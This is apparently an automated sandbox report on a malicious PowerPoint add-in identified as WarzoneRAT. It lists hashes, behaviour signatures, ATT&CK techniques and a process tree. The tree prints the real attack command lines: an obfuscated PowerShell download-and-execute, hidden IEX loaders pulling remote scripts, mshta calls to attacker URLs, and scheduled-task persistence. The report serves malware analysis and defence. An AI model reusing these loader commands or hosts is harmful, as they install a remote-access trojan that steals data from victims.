Overview

overview

10

Static

static

IdDetails.ppam

windows7_x64

10

IdDetails.ppam

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    161s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-07-2021 15:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IdDetails.ppam

  • Size

    16KB

  • MD5

    8fb67950eee24c33116c5c8ae87bbde1

  • SHA1

    26d8b5eec451ed68f3a61f4f69b4fadffb736d22

  • SHA256

    a524b17edc79f1cacd57f9a07becfd24df6d0ef893d11620cb3c300c86c327ed

  • SHA512

    1c03f7930d08ad4ea8d7fc0f8527d5db6bc618989e8ab9183abe05309d6b9f75f0eef61271059a576e2709a7d6ec5385f206d48ca99eeda9832148fa1117c9e3

Score
10/10
warzoneratinfostealerrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt

Extracted

Family

warzonerat

C2

normanaman.duckdns.org:3009

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Blocklisted process makes network request 20 IoCs
  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\IdDetails.ppam" /ou ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4444
    • C:\Windows\SYSTEM32\mshta.exe
      mshta http://www.bitly.com/ashjdkqowdhqowdh
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"
          4⤵
            PID:5056
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html\""
          3⤵
          • Creates scheduled task(s)
          PID:1900
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/2.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601403.us.archive.org/11/items/3_20210710_20210710/3.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1812
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            #cmd
            4⤵
              PID:4832
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "{path}"
              4⤵
                PID:4964
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                #cmd
                4⤵
                  PID:3124
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  #cmd
                  4⤵
                    PID:3248
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    #cmd
                    4⤵
                      PID:2276
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      #cmd
                      4⤵
                        PID:4128
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -u -p 4268 -s 2888
                      3⤵
                      • Program crash
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2932
                  • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
                    "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 2828
                    2⤵
                    • Process spawned suspicious child process
                    PID:4304
                • C:\Windows\system32\werfault.exe
                  werfault.exe /h /shared Global\13e3e51f9f4d4cafa6966ff7132d4244 /t 3836 /p 4444
                  1⤵
                    PID:1136
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /sc MINUTE /mo 80 /tn ""BatFile"" /F /tr ""\""C:\Users\Public\clone.vbs""
                    1⤵
                    • Process spawned unexpected child process
                    • Creates scheduled task(s)
                    PID:3748

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Initial Access

                  Execution

                  Scheduled Task

                  1
                  T1053

                  Persistence

                  Scheduled Task

                  1
                  T1053

                  Privilege Escalation

                  Scheduled Task

                  1
                  T1053

                  Defense Evasion

                  Credential Access

                  Discovery

                  System Information Discovery

                  1
                  T1082

                  Lateral Movement

                  Collection

                  Exfiltration

                  Command and Control

                  Impact

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    MD5

                    ba0c69ceb0908b193521106967959098

                    SHA1

                    44ca77c41d4ab2c17df1c831c41900e4f692f8de

                    SHA256

                    71f2c3e06e74aa830de694c5a96927e37919c322b8e2ace896a87cbf44b32f55

                    SHA512

                    cf70230fe5dc40ff2b4d03dd9dedd7444f70430e35da55627ec8963244f47dce150e371b5015e508fed11b02a8e84cad240cd6d251dac2df3037ce149d03ca97

                    Download Submit
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    MD5

                    a98c93b23d6a2122c96c2a3bd8606e88

                    SHA1

                    7409c65007405982279319fb1877da06a9c40c5a

                    SHA256

                    758c1de4173cee4e6e2b96f9a5f5a4d78cd6ff57e5cdf913878cf4c76d12c42f

                    SHA512

                    b1d964d50afdc472c9fb0a123477452b7d9b2450d38af7608264848146fa205ca3a6aace7411c7c189df6c37106c05fae8b4060c4842a848e6456acba59af865

                    Download Submit
                  • C:\Users\Public\lub.vbs
                    MD5

                    1edd4ddfe49d879dd3c977804a05b9bd

                    SHA1

                    17157ecc88f381e568f36b9263044450e9dfccbe

                    SHA256

                    d8a10361792b7d54e4084a5a9736e3c8e47e805be894b9a7965e48793f591efa

                    SHA512

                    6a75daef70bb16da4f33f33fe8e7263b35e327205c2c0f0cc1e44445c8103021ff200830698013f9ad8b3179127ae45a9260b8d10a2bc147417dc378d3a6d0df

                    Download Submit
                  • memory/1672-198-0x0000000000000000-mapping.dmp
                    Download
                  • memory/1672-229-0x000001C54B7E6000-0x000001C54B7E8000-memory.dmp
                    Filesize

                    8KB

                    Download
                  • memory/1672-219-0x000001C54B7E3000-0x000001C54B7E5000-memory.dmp
                    Filesize

                    8KB

                    Download
                  • memory/1672-216-0x000001C54B7E0000-0x000001C54B7E2000-memory.dmp
                    Filesize

                    8KB

                    Download
                  • memory/1672-213-0x000001C54B970000-0x000001C54B971000-memory.dmp
                    Filesize

                    4KB

                    Download
                  • memory/1672-209-0x000001C54B790000-0x000001C54B791000-memory.dmp
                    Filesize

                    4KB

                    Download
                  • memory/1812-241-0x000001BFCDB20000-0x000001BFCDB23000-memory.dmp
                    Filesize

                    12KB

                    Download
                  • memory/1812-235-0x000001BFCDB00000-0x000001BFCDB0B000-memory.dmp
                    Filesize

                    44KB

                    Download
                  • memory/1812-269-0x000001BFCDB30000-0x000001BFCDB31000-memory.dmp
                    Filesize

                    4KB

                    Download
                  • memory/1812-251-0x000001BFCDCF0000-0x000001BFCDD10000-memory.dmp
                    Filesize

                    128KB

                    Download
                  • memory/1812-200-0x0000000000000000-mapping.dmp
                    Download
                  • memory/1812-230-0x000001BFCD986000-0x000001BFCD988000-memory.dmp
                    Filesize

                    8KB

                    Download
                  • memory/1812-220-0x000001BFCD980000-0x000001BFCD982000-memory.dmp
                    Filesize

                    8KB

                    Download
                  • memory/1812-221-0x000001BFCD983000-0x000001BFCD985000-memory.dmp
                    Filesize

                    8KB

                    Download
                  • memory/1900-199-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4128-263-0x0000000000405E28-mapping.dmp
                    Download
                  • memory/4268-190-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4444-119-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
                    Filesize

                    64KB

                    Download
                  • memory/4444-122-0x0000021DA7560000-0x0000021DA864E000-memory.dmp
                    Filesize

                    16.9MB

                    Download
                  • memory/4444-123-0x00007FF9D0890000-0x00007FF9D2785000-memory.dmp
                    Filesize

                    31.0MB

                    Download
                  • memory/4444-118-0x00007FF9D65E0000-0x00007FF9D81BD000-memory.dmp
                    Filesize

                    27.9MB

                    Download
                  • memory/4444-115-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
                    Filesize

                    64KB

                    Download
                  • memory/4444-114-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
                    Filesize

                    64KB

                    Download
                  • memory/4444-116-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
                    Filesize

                    64KB

                    Download
                  • memory/4444-117-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
                    Filesize

                    64KB

                    Download
                  • memory/4832-236-0x0000000000400000-0x000000000055E000-memory.dmp
                    Filesize

                    1.4MB

                    Download
                  • memory/4832-240-0x0000000000400000-0x000000000055E000-memory.dmp
                    Filesize

                    1.4MB

                    Download
                  • memory/4832-237-0x0000000000405E28-mapping.dmp
                    Download
                  • memory/4964-243-0x0000000000405E28-mapping.dmp
                    Download
                  • memory/5056-248-0x0000000000000000-mapping.dmp
                    Download